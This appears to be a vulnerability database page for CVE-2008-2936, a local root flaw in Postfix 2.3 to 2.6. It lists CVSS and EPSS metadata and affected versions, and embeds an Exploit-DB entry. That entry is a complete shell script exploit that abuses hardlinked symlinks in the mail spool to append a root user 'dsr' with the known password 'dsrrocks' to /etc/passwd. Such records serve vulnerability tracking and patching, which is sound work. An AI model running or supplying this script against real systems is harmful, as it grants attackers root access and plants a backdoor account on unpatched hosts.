Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-264 |
Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
6.2 |
|
AV:L/AC:H/Au:N/C:C/I:C/A:C |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 6337
Publication date : 2008-08-30 22h00 +00:00
Author : RoMaNSoFt
EDB Verified : Yes
#!/bin/sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#
# Config
writable_dir=/tmp
spool_dir=/var/mail # Use "postconf mail_spool_directory" to obtain this
user=root
target=/etc/passwd
useful_link=/usr/bin/atq # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at
useful_link_dst=at # Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less
seconds=3
user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh" # Pass is "dsrrocks"
postfix=`which postfix` # /usr/sbin/postfix
postconf=/usr/sbin/postconf
postmap=/usr/sbin/postmap
# Funcs
quit()
{
echo "$1"
exit
}
# Step 1: is my system vulnerable?
head -n 9 $0 | tail -n 8
if [ $postfix ] ; then
echo "[*] Postfix seems to be installed"
else
quit "[!] Are you sure Postfix is installed?"
fi
mkdir -p $writable_dir/pocfix
touch $writable_dir/pocfix/src
ln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1
ln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2
if [ -L $writable_dir/pocfix/dst2 ] ; then
echo "[*] Hardlink to symlink not dereferenced"
rm -rf $writable_dir/pocfix
else
rm -rf $writable_dir/pocfix
quit "[!] Hardlink to symlink correctly dereferenced. System is not vulnerable"
fi
if [ -d $spool_dir -a -w $spool_dir ] ; then
echo "[*] Spool dir is writable"
else
quit "[!] Spool dir is not writable"
fi
if [ -e $spool_dir/$user ] ; then
rm -f $spool_dir/$user
echo "[*] Mailbox for \"$user\" found. Trying to delete it"
if [ -e $spool_dir/$user ] ; then
quit "[!] Couldn't delete it"
else
echo "[*] Deletion ok"
fi
fi
if [ -e $spool_dir/$useful_link_dst ] ; then
rm -f $spool_dir/$useful_link_dst
echo "[*] Mailbox for \"$useful_link_dst\" found. Trying to delete it"
if [ -e $spool_dir/$useful_link_dst ] ; then
quit "[!] Couldn't delete it"
else
echo "[*] Deletion ok"
fi
fi
aliases=`$postconf alias_database | cut -d"=" -f2`
$postconf alias_maps | grep -q $aliases
if [ $? -eq 0 ] ; then
if [ $aliases ] ; then
$postmap -q $user $aliases > /dev/null
if [ $? -eq 0 ] ; then
quit "[!] Mail alias for \"$user\" exists"
fi
fi
fi
lda=`$postconf mailbox_command | cut -d"=" -f2`
if [ $lda ] ; then
quit "[!] Non-Postfix LDA detected"
fi
$postconf home_mailbox | grep -q '/$'
if [ $? -eq 0 ] ; then
quit "[!] Maildir-style mailbox detected"
fi
# Step 2: Exploiting
ln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't create hardlink (different partitions?)"
ln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!] Couldn't create symlink pointing to target file"
cp -f $target $writable_dir/pocfix_target_backup.$$ && echo "[*] Backed up: $target (saved as \"$writable_dir/pocfix_target_backup.$$\")"
echo "[*] Sending mail ($seconds seconds wait)"
echo $user_in_passwd | /usr/sbin/sendmail $user
sleep $seconds
diff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null
if [ $? -eq 0 ] ; then
echo "[!] Exploit failed"
else
echo "[*] Exploit successful (appended data to $target). Now \"su dsr\", pass is \"dsrrocks\")"
fi
rm -f $spool_dir/$user
rm -f $spool_dir/$useful_link_dst
# milw0rm.com [2008-08-31]
Products Mentioned
Configuraton 0
Postfix>>Postfix >> Version 2.3.0
Postfix>>Postfix >> Version 2.3.1
Postfix>>Postfix >> Version 2.3.2
Postfix>>Postfix >> Version 2.3.3
Postfix>>Postfix >> Version 2.3.4
Postfix>>Postfix >> Version 2.3.5
Postfix>>Postfix >> Version 2.3.6
Postfix>>Postfix >> Version 2.3.7
Postfix>>Postfix >> Version 2.3.8
Postfix>>Postfix >> Version 2.3.9
Postfix>>Postfix >> Version 2.3.10
Postfix>>Postfix >> Version 2.3.11
Postfix>>Postfix >> Version 2.3.12
Postfix>>Postfix >> Version 2.3.13
Postfix>>Postfix >> Version 2.3.14
Postfix>>Postfix >> Version 2.4.0
Postfix>>Postfix >> Version 2.4.1
Postfix>>Postfix >> Version 2.4.2
Postfix>>Postfix >> Version 2.4.3
Postfix>>Postfix >> Version 2.4.4
Postfix>>Postfix >> Version 2.4.5
Postfix>>Postfix >> Version 2.4.6
Postfix>>Postfix >> Version 2.4.7
Postfix>>Postfix >> Version 2.5.0
Postfix>>Postfix >> Version 2.5.1
Postfix>>Postfix >> Version 2.5.2
Postfix>>Postfix >> Version 2.5.3
Postfix>>Postfix >> Version 2.6.0
References